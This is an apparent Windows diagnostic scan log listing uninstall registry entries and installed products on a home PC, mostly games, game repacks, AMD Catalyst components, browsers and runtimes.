[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\InstallShield_{28142407-ACAD-4ECD-A6B6-9FA8471F6062}] : (Scarface: The World is Yours.-.Sierra Entertainment) -> C:\PROGRA~2\COMMON~1\INSTAL~1\Driver\1150\INTEL3~1\IDriver.exe /M{28142407-ACAD-4ECD-A6B6-9FA8471F6062} 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Iron Front] : (Iron Front Uninstall.-.) -> C:\Program files\AWAR\Iron Front - Liberation 1944\UnInstall.exe
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\L.A.Noire_R.G. Gamblers_is1] : (L.A.Noire.-.R.G. Gamblers, spider91) -> "C:\Users\PC\AppData\Roaming\L.A.Noire\Uninstall\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\LCPD First Response] : (LCPD First Response.-.G17 Media) -> D:\Grand Theft Auto IV\LCPD First Response\uninst.exe
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\League of Legends 3.0.1] : (League of Legends.-.Riot Games) -> msiexec.exe /x {3E75652D-99B1-417E-B163-BEF33CAD3F16}
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Mafia II_is1] : (Mafia II.-.) -> "D:\Mafia II\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Minecraft1.7.2] : (Minecraft1.7.2.-.) -> C:\Users\PC\AppData\Roaming\.minecraft\minecraft launcher\Uninstall.exe
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\MobileOptionPack] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Modem HDM EC156] : (Modem HDM EC156.-.Huawei Technologies Co.,Ltd) -> C:\Program Files (x86)\Modem HDM EC156\uninst.exe
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Modem X080C Plus] : (Modem X080C Plus.-.ALCATEL) -> C:\Program Files\Modem X080C Plus\Uninstall.exe
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Mozilla Firefox 33.0 (x86 fr)] : (Mozilla Firefox 33.0 (x86 fr).-.Mozilla) -> "C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\MozillaMaintenanceService] : (Mozilla Maintenance Service.-.Mozilla) -> "C:\Program Files (x86)\Mozilla Maintenance Service\uninstall.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Nero8Lite_is1] : (Nero 8 Lite 8.3.6.0.-.Updatepack.nl) -> "C:\Program Files (x86)\Nero\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Patrician IV Gold Edition_is1] : (Patrician IV Gold Edition.-.) -> "D:\Patrician IV Gold Edition\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\RealPlayer 15.0] : (RealPlayer.-.RealNetworks) -> C:\Program Files (x86)\Real\RealPlayer\Update\r1puninst.exe RealNetworks|RealPlayer|15.0
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Rockstar Games Social Club] : (Rockstar Games Social Club.-.Rockstar Games) -> C:\Program Files\Rockstar Games\Social Club\uninstallRGSCRedistributable.exe
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\SchedulingAgent] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Sid Meier's Civilization V The Complete Edition ~01EC3566_is1] : (Sid Meier's Civilization V The Complete Edition repack Mr DJ version 1.0.3.279.-.Mr DJ) -> "C:\Program Files (x86)\Mr DJ\Sid Meier's Civilization V The Complete Edition repack Mr DJ\Uninstall\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Sleeping Dogs - Definitive Edition_R.G. Mechanics_is1] : (Sleeping Dogs - Definitive Edition.-.R.G. Mechanics, markfiter) -> "C:\Users\PC\AppData\Roaming\Sleeping Dogs - Definitive Edition\Uninstall\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Steam] : (Steam.-.Valve Corporation) -> C:\Program Files (x86)\Steam\uninstall.exe
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Stellaris Utopia_is1] : (Stellaris Utopia.-.) -> "D:\Stellaris Utopie\Stellaris Utopia\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\TechPowerUp GPU-Z] : (TechPowerUp GPU-Z.-.TechPowerUp) -> "C:\Program Files (x86)\GPU-Z\uninstall.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\The Elder Scrolls V Skyrim - Legendary Edition_is1] : (The Elder Scrolls V Skyrim - Legendary Edition.-.) -> "D:\Bethesda Softworks\The Elder Scrolls V Skyrim - Legendary Edition\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Tropico 5 - Complete Collection_is1] : (Tropico 5 - Complete Collection.-.) -> "C:\Program Files (x86)\Kalypso Media Digital\Tropico 5 - Complete Collection\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Tunngle_is1] : (Tunngle.-.Tunngle.net GmbH) -> "C:\Program Files (x86)\Tunngle\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Victoria II - A Heart of Darkness_is1] : (A Heart of Darkness.-.Paradox Interactive) -> "D:\Darkness\Victoria II - A Heart of Darkness\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\VLC media player] : (VLC media player 2.0.5.-.VideoLAN) -> C:\Program Files (x86)\VideoLAN\VLC\uninstall.exe
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Way of the Samurai 3_is1] : (Way of the Samurai 3.-.) -> "D:\Games\Way of the Samurai 3\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\WIC] : (.-.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\Windows Media Encoder 9] : (Windows Media Encoder 9 Series.-.) -> msiexec.exe /I {E38C00D0-A68B-4318-A8A6-F7D4B5B1DF0E}
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\WinRAR archiver] : (WinRAR 5.21 (32-bit).-.win.rar GmbH) -> C:\Program Files (x86)\WinRAR\uninstall.exe
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\World of Warcraft] : (World of Warcraft.-.Blizzard Entertainment) -> "C:\ProgramData\Battle.net\Agent\Blizzard Uninstaller.exe" --lang=frFR --uid=wow_frfr --displayname="World of Warcraft"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{01db25f3-1b76-4d97-88c8-1c90634d88fb}] : (Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610.-.?????????? ??????????) -> "C:\ProgramData\Package Cache\{01db25f3-1b76-4d97-88c8-1c90634d88fb}\vcredist_x86.exe"  /uninstall
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{0F659036-14C7-4622-9505-35A0DC93526A}] : (System Requirements Lab.-.Husdawg, LLC) -> MsiExec.exe /I{0F659036-14C7-4622-9505-35A0DC93526A}
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{0FE3F13F-8A37-46BA-F973-762F81E833C3}] : (CCC Help French.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{11087D24-567D-7D88-69C6-D7A08B5F4C47}] : (Catalyst Control Center - Branding.-.Advanced Micro Devices, Inc.) -> MsiExec.exe /I{11087D24-567D-7D88-69C6-D7A08B5F4C47}
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{1543E140-FADF-9E99-D388-4435C2FBC55E}] : (CCC Help Chinese Standard.-.Advanced Micro Devices, Inc.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83218031F0}] : (Java 8 Update 31.-.Oracle Corporation) -> MsiExec.exe /I{26A24AE4-039D-4CA4-87B4-2F83218031F0}
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{26FDF89A-FA65-4FA2-8522-37CC84DFDCEE}] : (Mercenaries(tm) 2: l'Enfer des Favelas.-.Electronic Arts) -> MsiExec.exe /X{26FDF89A-FA65-4FA2-8522-37CC84DFDCEE}
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{28142407-ACAD-4ECD-A6B6-9FA8471F6062}] : (Scarface: The World is Yours.-.Sierra Entertainment) -> 
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{28C2DED6-325B-4CC7-983A-1777C8F7FBAB}] : (RealUpgrade 1.1.-.RealNetworks, Inc.) -> MsiExec.exe /I{28C2DED6-325B-4CC7-983A-1777C8F7FBAB}
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{2C9A2369-162D-7AD7-D50F-5F59CEC8A046}] : (CCC Help Danish.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{2D61415B-F99C-8161-F452-760B6E441428}] : (CCC Help Hungarian.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{339647D6-A277-974F-FF29-83CA6284559B}] : (CCC Help German.-.Advanced Micro Devices, Inc.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{3C262E00-3C8B-4774-83DB-6412EDFE9FB4}_is1] : (Iron Europe.-.Iron Europe Development Team) -> "C:\Program Files (x86)\Steam\steamapps\common\MountBlade Warband\Modules\Iron Europe\unins001.exe"
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{3E75652D-99B1-417E-B163-BEF33CAD3F16}] : (League of Legends.-.Riot Games) -> MsiExec.exe /X{3E75652D-99B1-417E-B163-BEF33CAD3F16}
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{3F4650A8-529F-4F62-9841-0E6280C57A6B}_is1] : (Blood and Iron Age of Imperialism.-.Parrot, William) -> "C:\Program Files (x86)\Steam\steamapps\common\MountBlade Warband\Modules\Blood and Iron Age of Imperialism\unins000.exe"
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}] : (Java Auto Updater.-.Oracle Corporation) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{4B35F00C-E63D-40DC-9839-DF15A33EAC46}] : (Grand Theft Auto Vice City.-.) -> RunDll32 C:\PROGRA~2\COMMON~1\INSTAL~1\PROFES~1\RunTime\0701\Intel32\Ctor.dll,LaunchSetup "C:\Program Files (x86)\InstallShield Installation Information\{4B35F00C-E63D-40DC-9839-DF15A33EAC46}\Setup.exe" -l0x40c 
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{4BD8FB0D-9407-429D-C412-FAE0A318A8AE}] : (CCC Help Polish.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{4D594F78-0C6D-1442-61CC-94D735FEC05D}] : (CCC Help English.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{5454083B-1308-4485-BF17-1110000D8301}] : (Grand Theft Auto IV.-.Rockstar Games Inc.) -> MsiExec.exe /I{5454083B-1308-4485-BF17-1110000D8301}
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{5454083B-1308-4485-BF17-1110000D8302}] : (Grand Theft Auto IV.-.Rockstar Games Inc.) -> MsiExec.exe /I{5454083B-1308-4485-BF17-1110000D8302}
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{579BA58C-F33D-4970-9953-B94B43768AC3}] : (Grand Theft Auto IV.-.Rockstar Games) -> "C:\Program Files (x86)\InstallShield Installation Information\{579BA58C-F33D-4970-9953-B94B43768AC3}\setup.exe" -runfromtemp -l0x040c -removeonly
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{582876EC-A178-44D4-9823-C10D6C62EAFF}] : (.-.) -> MsiExec /X{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{5958C669-28BF-D667-A004-E6FBF448027D}] : (CCC Help Spanish.-.Advanced Micro Devices, Inc.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{5C9A7E65-5B71-4C7F-876A-8C6AF9E9E23D}_is1] : (The Saboteur / RePack by Baracuda.-.) -> "D:\The Saboteur\The Saboteur\Uninstall\unins000.exe"
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}] : (Google Update Helper.-.Google Inc.) -> MsiExec.exe /I{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{615bc16d-60f5-482e-91b3-b51d8130963b}] : (Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.51106 False.-.?????????? ??????????) -> "C:\ProgramData\Package Cache\{615bc16d-60f5-482e-91b3-b51d8130963b}\vcredist_x86.exe"  /uninstall
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{637B1239-84B7-0B0F-2549-7020CA57C831}] : (CCC Help Thai.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{6AE0A655-9BB8-460E-1956-ED37E3B221FA}] : (CCC Help Greek.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{7481E13B-EC16-1B14-0E32-E88165CD4C57}] : (Catalyst Control Center Graphics Previews Common.-.Advanced Micro Devices, Inc.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{7735559E-F41A-480F-A5FC-174F8B9EB58E}_is1] : (Iron Europe.-.Iron Europe Development Team) -> "C:\Program Files (x86)\Steam\steamapps\common\MountBlade Warband\Modules\Iron Europe\unins000.exe"
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{7770E71B-2D43-4800-9CB3-5B6CAAEBEBEA}] : (RealNetworks - Microsoft Visual C++ 2008 Runtime.-.RealNetworks, Inc) -> MsiExec.exe /X{7770E71B-2D43-4800-9CB3-5B6CAAEBEBEA}
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{7ABA4B54-3672-0548-C1CC-97405F767061}] : (CCC Help Russian.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{7FE73251-50FA-E864-67EB-19C4BC7AA1C9}] : (CCC Help Portuguese.-.Advanced Micro Devices, Inc.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{80AE0E0A-5579-4015-9C1A-35F2F2CE5673}] : (911 - First Responders.-.) -> RunDll32 C:\PROGRA~2\COMMON~1\INSTAL~1\PROFES~1\RunTime\0701\Intel32\Ctor.dll,LaunchSetup "C:\Program Files (x86)\InstallShield Installation Information\{80AE0E0A-5579-4015-9C1A-35F2F2CE5673}\setup.exe" -l0x9 
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{894CBED0-8225-D59B-5632-D01B14C6D520}] : (CCC Help Norwegian.-.Advanced Micro Devices, Inc.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}] : (NVIDIA PhysX.-.NVIDIA Corporation) -> MsiExec.exe /I{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{8BD7C51C-0CC4-3E28-CFDC-F7D4C5583783}] : (CCC Help Finnish.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{8ECCC07B-83E3-3877-26DF-815CD2B30749}] : (CCC Help Italian.-.Advanced Micro Devices, Inc.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{8ED35B48-AFBD-4F32-8271-2257AD8B907E}_is1] : (Grand Theft Auto IV - Episodes From Liberty City.-.) -> "C:\Program Files (x86)\Grand Theft Auto IV - Episodes From Liberty City\Uninstall\unins000.exe"
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{988949CE-DE9A-D187-A010-22B9085FB813}] : (CCC Help Swedish.-.Advanced Micro Devices, Inc.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{9D15E813-0C26-41E7-ABC5-3EB06FF1B3CF}] : (Assassin's Creed ® III v1.06.-.Ubisoft) -> \"C:\Program Files (x86)\InstallShield Installation Information\{9D15E813-0C26-41E7-ABC5-3EB06FF1B3CF}\setup.exe\" -runfromtemp -l0x0019 -removeonly
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{9D15E813-0C26-41E7-ABC5-3EB06FF1B3CF}_is1] : («Assassin`s Creed III»  1.06.-.Ubisoft) -> "D:\R.G. Catalyst\Assassin`s Creed III\uninstall\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{9EDC3A3F-0804-4F9E-93E3-AAB5A29D0648}_is1] : (AZW Reloaded.-.Willhelm) -> "C:\Program Files (x86)\Steam\steamapps\common\MountBlade Warband\Modules\AZW Reloaded\unins000.exe"
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{A1416622-0DDE-45B5-B06C-DFC3ED94C53B}] : (The Godfather™ II.-.Electronic Arts) -> MsiExec.exe /X{A1416622-0DDE-45B5-B06C-DFC3ED94C53B}
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{A85092B2-8FB5-5A8C-B27A-69A3D78979D8}] : (CCC Help Korean.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}] : (Google Update Helper.-.Google Inc.) -> MsiExec.exe /I{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{AC6A4B00-C475-4D97-AED1-5D1FFC189A0A}] : (System Requirements Lab Detection.-.Husdawg, LLC) -> MsiExec.exe /X{AC6A4B00-C475-4D97-AED1-5D1FFC189A0A}
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{AC76BA86-0804-1033-1959-001824184103}] : (Adobe Refresh Manager.-.Adobe Systems Incorporated) -> MsiExec.exe /I{AC76BA86-0804-1033-1959-001824184103}
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1036-7B44-AC0F074E4100}] : (Adobe Acrobat Reader DC - Français.-.Adobe Systems Incorporated) -> MsiExec.exe /I{AC76BA86-7AD7-1036-7B44-AC0F074E4100}
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{B1977E93-5FC0-0BA4-2D5A-D3E69870C7D4}] : (CCC Help Chinese Traditional.-.Advanced Micro Devices, Inc.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{BBAB6D5D-1DD4-4D46-B5D9-121DCAB17DEC}] : (Battlestations: Pacific.-.Eidos plc) -> MsiExec.exe /I{BBAB6D5D-1DD4-4D46-B5D9-121DCAB17DEC}
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{BBC9BF50-A35D-B0C2-9117-F3CA2F6BB64A}] : (CCC Help Czech.-.Advanced Micro Devices, Inc.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{C05D8CDB-417D-4335-A38C-A0659EDFD6B8}] : (Les Sims™ 3.-.Electronic Arts) -> "C:\Program Files (x86)\InstallShield Installation Information\{C05D8CDB-417D-4335-A38C-A0659EDFD6B8}\Sims3Setup.exe" -runfromtemp -l0x040c -removeonly
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{CF2BFC1C-F47F-F92D-FC47-68281F76E707}] : (AMD Settings.-.Advanced Micro Devices, Inc.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{D0759C6C-1F01-345D-8F59-E3B43977D754}] : (Google Chrome.-.Google, Inc.) -> MsiExec.exe /X{D0759C6C-1F01-345D-8F59-E3B43977D754}
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{D0FD2FF9-1BE9-E729-3878-9A603B5F1529}] : (Catalyst Control Center Localization All.-.Advanced Micro Devices, Inc.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{D2BF5DDA-E2F3-4A33-8DF5-4F24CC051216}] : (The Witcher 2 Assassins of Kings.-.CD Projekt RED) -> MsiExec.exe /X{D2BF5DDA-E2F3-4A33-8DF5-4F24CC051216}
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{D417C96A-FCC7-4590-A1BB-FAF73F5BC98E}] : (GTA San Andreas.-.Rockstar Games) -> RunDll32 C:\PROGRA~2\COMMON~1\INSTAL~1\PROFES~1\RunTime\10\50\Intel32\Ctor.dll,LaunchSetup "C:\Program Files (x86)\InstallShield Installation Information\{D417C96A-FCC7-4590-A1BB-FAF73F5BC98E}\setup.exe" -l0x40c -removeonly
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{D94F2DE6-55B4-B211-A381-54089BC791A0}] : (CCC Help Japanese.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{EEFDBD75-0BD9-AC5F-8F61-903C6A19C0ED}] : (CCC Help Dutch.-.Advanced Micro Devices, Inc.) -> 
##########[{Hidden}][HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{FB415F81-DC5E-ED99-D2FE-3DC4D88BCA58}] : (CCC Help Turkish.-.Advanced Micro Devices, Inc.) -> 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\{FC965A47-4839-40CA-B618-18F486F042C6}] : (Skype™ 7.31.-.Skype Technologies S.A.) -> MsiExec.exe /X{FC965A47-4839-40CA-B618-18F486F042C6}
[HKLM\SOFTWARE\WOW6432Node\Microsoft\windows\CurrentVersion\Uninstall\«Emire: Total War™»_is1] : («Emire: Total War™».-.The Creative Assembly) -> "D:\Empire Total War\unins000.exe"

---------- | Ports 


---------- | Installer

[HKCR\Installer\Products\002DA08DC845B26B23EAFBC37DAAE72A] : Catalyst Control Center Next Localization FR -> C:\Windows\Installer\{D80AD200-548C-B62B-32AE-BF3CD7AA7EA2}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\00B4A6CA574C79D4EA1DD5F1CF81A9A0] : System Requirements Lab Detection -> C:\Windows\Installer\{AC6A4B00-C475-4D97-AED1-5D1FFC189A0A}\icon.ico
[HKCR\Installer\Products\02E9460AC75CAFCDEAB1C11EBCD9898A] : Catalyst Control Center Next Localization CHS -> C:\Windows\Installer\{A0649E20-C57C-DCFA-AE1B-1CE1CB9D98A8}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\041E3451FDAF99E93D8844532CBF5CE5] : CCC Help Chinese Standard -> C:\Windows\Installer\{1543E140-FADF-9E99-D388-4435C2FBC55E}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\05FB9CBBD53A2C0B19713FACF2B66BA4] : CCC Help Czech -> C:\Windows\Installer\{BBC9BF50-A35D-B0C2-9117-F3CA2F6BB64A}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\0D00C83EB86A81348A6A7F4D5B1BFDE0] : Windows Media Encoder 9 Series -> C:\Windows\Installer\{E38C00D0-A68B-4318-A8A6-F7D4B5B1DF0E}\ARPIcon
[HKCR\Installer\Products\0DEBC4985228B95D65230DB1416C5D02] : CCC Help Norwegian -> C:\Windows\Installer\{894CBED0-8225-D59B-5632-D01B14C6D520}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\15237EF7AF05468E76BE914CCBA71A9C] : CCC Help Portuguese -> C:\Windows\Installer\{7FE73251-50FA-E864-67EB-19C4BC7AA1C9}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\18F514BFE5CD99DE2DEFD34C8DB8AC85] : CCC Help Turkish -> C:\Windows\Installer\{FB415F81-DC5E-ED99-D2FE-3DC4D88BCA58}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\2266141AEDD05B540BC6FD3CDE495CB3] : The Godfather™ II
[HKCR\Installer\Products\2B29058A5BF8C8A52BA7963A7D98978D] : CCC Help Korean -> C:\Windows\Installer\{A85092B2-8FB5-5A8C-B27A-69A3D78979D8}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\39E7791B0CF54AB0D2A53D6E89077C4D] : CCC Help Chinese Traditional -> C:\Windows\Installer\{B1977E93-5FC0-0BA4-2D5A-D3E69870C7D4}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\3FB725890E8AFC8B277934B617F45C67] : Catalyst Control Center Next Localization EL -> C:\Windows\Installer\{98527BF3-A8E0-B8CF-7297-436B714FC576}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\42D78011D76588D7966C7D0AB8F5C474] : Catalyst Control Center - Branding -> C:\Windows\Installer\{11087D24-567D-7D88-69C6-D7A08B5F4C47}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\45B4ABA7276384501CCC7904F5670716] : CCC Help Russian -> C:\Windows\Installer\{7ABA4B54-3672-0548-C1CC-97405F767061}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\47A6A585DED10AD8231F5FFE4A58FD1B] : Catalyst Control Center Next Localization BR -> C:\Windows\Installer\{585A6A74-1DED-8DA0-32F1-F5EFA485DFB1}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\4E9E55619C40E4145818D61126FD8B20] : TortoiseSVN 1.9.5.27581 (64 bit) -> C:\Windows\Installer\{1655E9E4-04C9-414E-8581-6D1162DFB802}\TSVNIcon
[HKCR\Installer\Products\4EA42A62D9304AC4784BF2381208130F] : Java 8 Update 31
[HKCR\Installer\Products\52B1DC6D6E358F2CAF998F19839A8CF6] : Catalyst Control Center Next Localization ES -> C:\Windows\Installer\{D6CD1B25-53E6-C2F8-FA99-F89138A9C86F}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\556A0EA68BB9E0649165DE733E2B12AF] : CCC Help Greek -> C:\Windows\Installer\{6AE0A655-9BB8-460E-1956-ED37E3B221FA}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\5683C7845003A40FBF4A4F32E9208A74] : Catalyst Control Center Next Localization FI -> C:\Windows\Installer\{487C3865-3005-F04A-FBA4-F4239E02A847}\ARPPRODUCTICON.exe
